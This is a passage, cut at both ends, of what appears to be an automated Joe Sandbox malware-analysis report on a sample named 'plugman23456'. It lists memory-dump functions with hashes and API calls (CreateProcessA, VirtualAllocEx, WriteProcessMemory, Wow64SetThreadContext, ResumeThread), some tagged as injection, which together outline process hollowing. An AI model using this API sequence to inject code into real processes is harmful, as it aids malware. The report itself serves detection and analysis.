1104->1107 1108 1bfe41-1bfe45 1104->1108 1105->1102 1106->1104 1107->1108 1109 1bfe39 1107->1109 1110 1bfe7b-1bfe86 1108->1110 1111 1bfe47-1bfe70 1108->1111 1109->1108 1114 1bfe87 1110->1114 1111->1110 1114->1114
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001BFCFF
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: fe9eca4627647595239d103aa25c944054a81ecea77617624fc9950a3a0cf193
                          • Instruction ID: 34901d902f176a0a0c9471d3a52352c2ea8fcc29c11e81fc30c7f20657bb0e40
                          • Opcode Fuzzy Hash: fe9eca4627647595239d103aa25c944054a81ecea77617624fc9950a3a0cf193
                          • Instruction Fuzzy Hash: 2BC11471D002198FDF24CFA8CD55BEDBBB1BB09300F0095AAD819B7250DB749A86CF95
                          Function 001BF698 Relevance: 1.6, APIs: 1, Instructions: 120injectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1116 1bf698-1bf70b 1118 1bf70d-1bf71f 1116->1118 1119 1bf722-1bf789 WriteProcessMemory 1116->1119 1118->1119 1121 1bf78b-1bf791 1119->1121 1122 1bf792-1bf7e4 1119->1122 1121->1122
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001BF773
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: d1d75392aa73e9e8d790bf93522c2bc4ad3a8ed0c23285c433f47cd1aa5595f8
                          • Instruction ID: 269c3c9f3dcba19ffa926dc65369121fa8b52d0aa16fbf07ea221cc22302aa62
                          • Opcode Fuzzy Hash: d1d75392aa73e9e8d790bf93522c2bc4ad3a8ed0c23285c433f47cd1aa5595f8
                          • Instruction Fuzzy Hash: 5C41BBB5D012589FCF00CFA9D984AEEFBF1BB49314F20902AE818B7250D734AA45CF64
                          Function 001BF6A0 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1127 1bf6a0-1bf70b 1129 1bf70d-1bf71f 1127->1129 1130 1bf722-1bf789 WriteProcessMemory 1127->1130 1129->1130 1132 1bf78b-1bf791 1130->1132 1133 1bf792-1bf7e4 1130->1133 1132->1133
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001BF773
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: ea2aae321c7381a8834c0f6baea6fba75cb4ffbb700d7d44deaf7d0ba08cfa00
                          • Instruction ID: e8ad01f95331f837b27d71b6f98d0fdbd1c8219ed5221d9ced23019ce8490bf3
                          • Opcode Fuzzy Hash: ea2aae321c7381a8834c0f6baea6fba75cb4ffbb700d7d44deaf7d0ba08cfa00
                          • Instruction Fuzzy Hash: CC41AAB5D002589FCF00CFA9D984AEEFBF1BB49314F20942AE814B7250D775AA45CF64
                          Function 001BF7F9 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1138 1bf7f9-1bf8c8 ReadProcessMemory 1141 1bf8ca-1bf8d0 1138->1141 1142 1bf8d1-1bf923 1138->1142 1141->1142
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001BF8B2
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 9b23acb2e3e70e46aa3e5ddea8c2d6fdf3b22bc1557fe6bac97207bd99342c1c
                          • Instruction ID: 09dfc3d78dc4ac4cdcd05f8c0a2463c035ead69ebe99b05f9f7d7e7c55e80bfc
                          • Opcode Fuzzy Hash: 9b23acb2e3e70e46aa3e5ddea8c2d6fdf3b22bc1557fe6bac97207bd99342c1c
                          • Instruction Fuzzy Hash: 4641C9B9D042589FCF10CFA9D984AEEFBB1BF49310F20942AE815B7250C735A946CF64
                          Function 001BF800 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1147 1bf800-1bf8c8 ReadProcessMemory 1150 1bf8ca-1bf8d0 1147->1150 1151 1bf8d1-1bf923 1147->1151 1150->1151
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001BF8B2
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 719783f6ea0345c10ffb8d94040b829600bf4f40f6431e13b376ef1ff97501d3
                          • Instruction ID: c6309cc23e42b35bc108d28b0cecbea8708c6b6f0ad5bf44c4618fedadab9cd0
                          • Opcode Fuzzy Hash: 719783f6ea0345c10ffb8d94040b829600bf4f40f6431e13b376ef1ff97501d3
                          • Instruction Fuzzy Hash: 8941BAB5D002589FCF10CFAAD984AEEFBB1BF49310F20942AE814B7200D735A946CF64
                          Function 001BF571 Relevance: 1.6, APIs: 1, Instructions: 106memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1156 1bf571-1bf638 VirtualAllocEx 1159 1bf63a-1bf640 1156->1159 1160 1bf641-1bf68b 1156->1160 1159->1160
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001BF622
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: d68e5ca511b2b1b9f1f011de61b17544f353e67a75fcff97847ef61b94ab0f5c
                          • Instruction ID: f0fbafc8418d1603fe5791c66e9839ba62506b71b1ab991a31994497cdaa4f6e
                          • Opcode Fuzzy Hash: d68e5ca511b2b1b9f1f011de61b17544f353e67a75fcff97847ef61b94ab0f5c
                          • Instruction Fuzzy Hash: 4C41AAB9D002489FCF10CFA9D984AEEFBB1BB49310F20942AE815B7314D735A906CF55
                          Function 001BF578 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1165 1bf578-1bf638 VirtualAllocEx 1168 1bf63a-1bf640 1165->1168 1169 1bf641-1bf68b 1165->1169 1168->1169
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001BF622
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: e40e66e5712bd29ca543aea5977d38026e4cf7a089aabf4e13d94a2d15cf1303
                          • Instruction ID: 2a1b35f7609d60f46dd20892a6fd0e97b5471fbc9e4f123bd81a4d9c8077c1dc
                          • Opcode Fuzzy Hash: e40e66e5712bd29ca543aea5977d38026e4cf7a089aabf4e13d94a2d15cf1303
                          • Instruction Fuzzy Hash: A84199B9D002589FCF10CFA9D984AEEFBB1BB49310F20942AE815B7314D735A946CF65
                          Function 001BF441 Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1174 1bf441-1bf4a8 1176 1bf4aa-1bf4bc 1174->1176 1177 1bf4bf-1bf50d Wow64SetThreadContext 1174->1177 1176->1177 1179 1bf50f-1bf515 1177->1179 1180 1bf516-1bf562 1177->1180 1179->1180
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 001BF4F7
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: f0b9dd48f1201e9110e37edf1c3e647d3f1578da5fb41e6e25d9c1acc480eff8
                          • Instruction ID: d9b746fb4bfc9cd9459272fe304acece53755c77a84fe4bbd251e14032b428ed
                          • Opcode Fuzzy Hash: f0b9dd48f1201e9110e37edf1c3e647d3f1578da5fb41e6e25d9c1acc480eff8
                          • Instruction Fuzzy Hash: ED41BFB5D002589FCF10CFA9D984AEEFFB1AF49314F24842AE419B7244C778A949CF54
                          Function 001BF448 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1185 1bf448-1bf4a8 1187 1bf4aa-1bf4bc 1185->1187 1188 1bf4bf-1bf50d Wow64SetThreadContext 1185->1188 1187->1188 1190 1bf50f-1bf515 1188->1190 1191 1bf516-1bf562 1188->1191 1190->1191
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 001BF4F7
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 7f1e40a863f393705ad1714055f243c6cfa9c8e145a48f0fdd6b9a1fd002f602
                          • Instruction ID: f0fd1ba12aa92eb35ac770236f27287a431478f911c74c5ac5b74c5ca904bc77
                          • Opcode Fuzzy Hash: 7f1e40a863f393705ad1714055f243c6cfa9c8e145a48f0fdd6b9a1fd002f602
                          • Instruction Fuzzy Hash: B741AEB5D002589FCF10CFAAD984AEEFBB1BF49314F24842AE418B7244D779AA45CF54
                          Function 001BF350 Relevance: 1.6, APIs: 1, Instructions: 79threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1196 1bf350-1bf3ec ResumeThread 1200 1bf3ee-1bf3f4 1196->1200 1201 1bf3f5-1bf437 1196->1201 1200->1201
                          APIs
                          • ResumeThread.KERNELBASE(?), ref: 001BF3D6
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 0839a778149e1f78ab74e82f956fd328428c1e4cf0f42b05471335372ba0e53e
                          • Instruction ID: 40ebb4a09e774e8cac9151e81655e87d6d408097891d98bafac7bef3e3e49879
                          • Opcode Fuzzy Hash: 0839a778149e1f78ab74e82f956fd328428c1e4cf0f42b05471335372ba0e53e
                          • Instruction Fuzzy Hash: 5831D9B4D002189FCF10CFAAD984AEEFBB5BB49314F24942AE814B7310D775A906CF94
                          Function 001BF358 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                          Download Yara Rule
                          APIs
                          • ResumeThread.KERNELBASE(?), ref: 001BF3D6
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: d67c0478e97ac2d723e193dad26d6e41bdfa4bb03709962bb04393b7662d17cb
                          • Instruction ID: ece6366a8573586b4a1b64c7779ddf3996dc8f8b736325dad25fe199e6093956
                          • Opcode Fuzzy Hash: d67c0478e97ac2d723e193dad26d6e41bdfa4bb03709962bb04393b7662d17cb
                          • Instruction Fuzzy Hash: 3931B9B4D002189FCF14CFAAD984AEEFBB5BB49314F24942AE814B7310D775A906CF94
                          Function 00D71D93 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID: }(l
                          • API String ID: 0-2730413756
                          • Opcode ID: c2882f6cf2ef8b44501c31f50598697ebdd81a409b2a9c8fc5f634e35f213035
                          • Instruction ID: e7dabafd9c9b4122ee1bc9f1ba8868ef037995e4c0eb23acfbd36c9faff00585
                          • Opcode Fuzzy Hash: c2882f6cf2ef8b44501c31f50598697ebdd81a409b2a9c8fc5f634e35f213035
                          • Instruction Fuzzy Hash: F221A374E003188FDB14DFA4C855AADBBB2EF8A301F208129D8196B395DB355D42CF51
                          Function 00D71BB0 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID: d/p
                          • API String ID: 0-541466032
                          • Opcode ID: 422a6f37de5a05fffabed60224b78f5f9684d3e7d907bd8fe1c1f6087e147fd8
                          • Instruction ID: d2f6cbb0e865c6f61216f6b0740569d61c3d5dd500a3f8bfc0b7829a07e7a501
                          • Opcode Fuzzy Hash: 422a6f37de5a05fffabed60224b78f5f9684d3e7d907bd8fe1c1f6087e147fd8
                          • Instruction Fuzzy Hash: 9201BC78845248EFCF06DFE8D810AADBF75EB46300F04829AEC4467260D7350A55EF61
                          Function 00D73314 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID: (
                          • API String ID: 0-3887548279
                          • Opcode ID: e2b26a8af82421337a6ef27f682b6af5c22c7adb96dff31a2fdbdcc9cd1306d0
                          • Instruction ID: da37efa98c91292d8d831be31f6c4ed2645c5158c7eaae9f20d43d52f7bc7dfc
                          • Opcode Fuzzy Hash: e2b26a8af82421337a6ef27f682b6af5c22c7adb96dff31a2fdbdcc9cd1306d0
                          • Instruction Fuzzy Hash: 0111607590A2289FDB60CF58C980BE8B7B9BB49315F1090D9D44EA6242D7359B85EF10
                          Function 00D72438 Relevance: .4, Instructions: 411COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7e4afb3f67eadf12a6d86aba29a8244930cacac5620f0061cfb6ec7c85cf5e4d
                          • Instruction ID: 3910db15e5a76f6f33092d62e54da78710047a502308204d21d3a4ae9517bf60
                          • Opcode Fuzzy Hash: 7e4afb3f67eadf12a6d86aba29a8244930cacac5620f0061cfb6ec7c85cf5e4d
                          • Instruction Fuzzy Hash: F0E04FA084B2846ED716C664AC21EBE7F389B83204B1541CBD88486192D6A10A05EB72
                          Function 00D70101 Relevance: .1, Instructions: 113COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ddae0f6202564eff2ddbafcb0735bada52a532309c3f6a20aed38f5e811c4887
                          • Instruction ID: e31190f84d191ff5a4ac952d5647a54bd978799305ea03d4b934c36ef6284bc2
                          • Opcode Fuzzy Hash: ddae0f6202564eff2ddbafcb0735bada52a532309c3f6a20aed38f5e811c4887
                          • Instruction Fuzzy Hash: 0C413A7490A219CFCB14CFA4E8487ECBBF5BB4A305F20A066D44EA7295E7348985DF24
                          Function 00D708A3 Relevance: .1, Instructions: 104COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7d3858567454da7573be427b0e1071766470660c9156fa1021df717c999b5455
                          • Instruction ID: 3aad6ed6726c0ea860d21c570753ca9f93e9972066c0732546a78080429bae1e
                          • Opcode Fuzzy Hash: 7d3858567454da7573be427b0e1071766470660c9156fa1021df717c999b5455
                          • Instruction Fuzzy Hash: 4931E675D4A208CFDB00CFA8D4946FDBFF8AB0A310F28A119D54EA7282E7749941DF64
                          Function 00D73207 Relevance: .1, Instructions: 92COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fd7790c23a12a4634ccad56772451e9e83cf491f797f67c8a82042fd11d624d3
                          • Instruction ID: d30e4bf5a299cbd10dc1907127171135eee07b5b5550fc0f9ba602028922ed76
                          • Opcode Fuzzy Hash: fd7790c23a12a4634ccad56772451e9e83cf491f797f67c8a82042fd11d624d3
                          • Instruction Fuzzy Hash: 8531F775909218CFDB24CF54C884BEDBBB5AB4A305F2490DAD44DAB292E7319B85EF10
                          Function 00D71171 Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3e95450d944b48dff166cb3f812b899493fa40d42bf3be30afe0b0f0de805ff3
                          • Instruction ID: e4edad84409d5c46e3d46ad8b0e708be03a2cc2d4fd7a79e245137dc636003ee
                          • Opcode Fuzzy Hash: 3e95450d944b48dff166cb3f812b899493fa40d42bf3be30afe0b0f0de805ff3
                          • Instruction Fuzzy Hash: 39119038D052089BDB04CFE9D8546EDFBB6AB8E311F14A129D909BB291D7714805CB24
                          Function 0016D1D4 Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.377420036.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_16d000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ffe8962890f7812caf46fe3c5fae04a616390221a0c7ca249bf947d2a7967d87
                          • Instruction ID: edeaa936adcd964ca4f2a2f908b4e42476c67e96e4b020e8a94ae4133bf398c2
                          • Opcode Fuzzy Hash: ffe8962890f7812caf46fe3c5fae04a616390221a0c7ca249bf947d2a7967d87
                          • Instruction Fuzzy Hash: 9421C2B5A04240EFDB15CF14E9D0B26BBA5FB84314F24C5ADE8494B256C336D85ACB61
                          Function 0016D01C Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.377420036.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_16d000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0ec48475966cffbcf21af511b4325280f7d5b206b0ccca5130688f379eaa7013
                          • Instruction ID: 7ad5fba05698fcee117c6953e84f88897ffb6b7fcfa625bd8efb3d14e5eee82a
                          • Opcode Fuzzy Hash: 0ec48475966cffbcf21af511b4325280f7d5b206b0ccca5130688f379eaa7013
                          • Instruction Fuzzy Hash: 1521B075A04240EFDB15CF14E884B26BB65EB84314F34C5A9E8494B246C736D857CBA1
                          Function 00D71C99 Relevance: .1, Instructions: 67COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9e4e1714beeeddd2ce99f636a43ed349f1deb9216170d71fa55912c705646f73
                          • Instruction ID: af7453cea09982361cb09ce37710b4d09002dbb75877254a5e76912a29fe7141
                          • Opcode Fuzzy Hash: 9e4e1714beeeddd2ce99f636a43ed349f1deb9216170d71fa55912c705646f73
                          • Instruction Fuzzy Hash: F921E4B8D042599FDB09CFAED8845AEFBF2BF8A300F14C66AD859A7250E7744901CF51
                          Function 00D71180 Relevance: .1, Instructions: 67COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b2edbe8fdd2d63d3985bd88443b719c55e50b6529701b882816603d91ea348f3
                          • Instruction ID: d2c2fcbfb1bae626fb91670c3dec13b19bf73151d18728dee3d47f98e30b1649
                          • Opcode Fuzzy Hash: b2edbe8fdd2d63d3985bd88443b719c55e50b6529701b882816603d91ea348f3
                          • Instruction Fuzzy Hash: F4115E38E052089BCB04CFE9D8545EDFBFAAB8E311F14A129D909B7291EB705805CB28
                          Function 00D7094A Relevance: .1, Instructions: 65COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f30510281e217c9a2e8746477b92c3032f11c8b7392e9f8dfb39888414720c3d
                          • Instruction ID: aaddc651f32374b55ada4af27adf1d6a83ac380e074074c5b9dcdfb6c1e4792b
                          • Opcode Fuzzy Hash: f30510281e217c9a2e8746477b92c3032f11c8b7392e9f8dfb39888414720c3d
                          • Instruction Fuzzy Hash: 2211D374D0A208CBDB10DFA4D4486EDBFF8AB0A301F28A01AD54EB7286E7709841DF64
                          Function 00D70D78 Relevance: .1, Instructions: 63COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a5f92aff5d69ce88cbe5c3749d9e27625b472811693cc9816563e40dc599913f
                          • Instruction ID: 10c212533270254d1dfa3c64940fc81f1f14484af3e542638df112e773e5291e
                          • Opcode Fuzzy Hash: a5f92aff5d69ce88cbe5c3749d9e27625b472811693cc9816563e40dc599913f
                          • Instruction Fuzzy Hash: E421C2B4D0520ADFCB44DFF8D9585AEBFB5FB4A301F24916AC409A3291E7745A02CFA1
                          Function 0016D006 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.377420036.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_16d000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8f6b684a59049e0a2dc1e2a63ac764b6733c0b658a5d3c99be70f6e552dc11b
                          • Instruction ID: 315111a4de01c59cdbd2e149bae8089d9ff6c7dfebe28bc9b086e30af66c9fb6
                          • Opcode Fuzzy Hash: d8f6b684a59049e0a2dc1e2a63ac764b6733c0b658a5d3c99be70f6e552dc11b
                          • Instruction Fuzzy Hash: 59218E755093808FDB02CF24D994B15BF71EB46314F28C5EAD8498F2A7C33AD81ACB62
                          Function 00D71CA8 Relevance: .1, Instructions: 61COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5670dac67114268269facefbacaf2f764236d2033a9f8f518056f3d3301d5090
                          • Instruction ID: 7588203d1d9eabc2428cddd79eb7f136ccbad0aee837fd3f7f40d93dc215518e
                          • Opcode Fuzzy Hash: 5670dac67114268269facefbacaf2f764236d2033a9f8f518056f3d3301d5090
                          • Instruction Fuzzy Hash: D121C575D002199BDB08CFAED8846AEFBF6BF89300F14C52AE859A7250E7705941CF50
                          Function 00D70B18 Relevance: .1, Instructions: 59COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bb93400fad98647e41330465a956b79f8fd9d14e3645e55e523494df109faacc
                          • Instruction ID: 2da3b120e755f2485e037d8bfa5d48f363919919ccafb20bd74c519670fa41a1
                          • Opcode Fuzzy Hash: bb93400fad98647e41330465a956b79f8fd9d14e3645e55e523494df109faacc
                          • Instruction Fuzzy Hash: 0E111674D04219DFCB04DFA4D4153EEBBF9EB8A305F10946AD41AA3291EB784A05CFA1
                          Function 00D708F0 Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62631ff1a2f7c0997463c537cad47bb140516ef0a44147eb64745299b78dbeb9
                          • Instruction ID: 3e1ee14ce554c08f0626b3737a304f1fcfd8df689e6bedd9cafe3ee244bbf365
                          • Opcode Fuzzy Hash: 62631ff1a2f7c0997463c537cad47bb140516ef0a44147eb64745299b78dbeb9
                          • Instruction Fuzzy Hash: 96110074C0E208CADB04DFA5D4482FDBBF8AB4A301F24E01AD14EA62D6E3B48804DE64
                          Function 00D708C8 Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
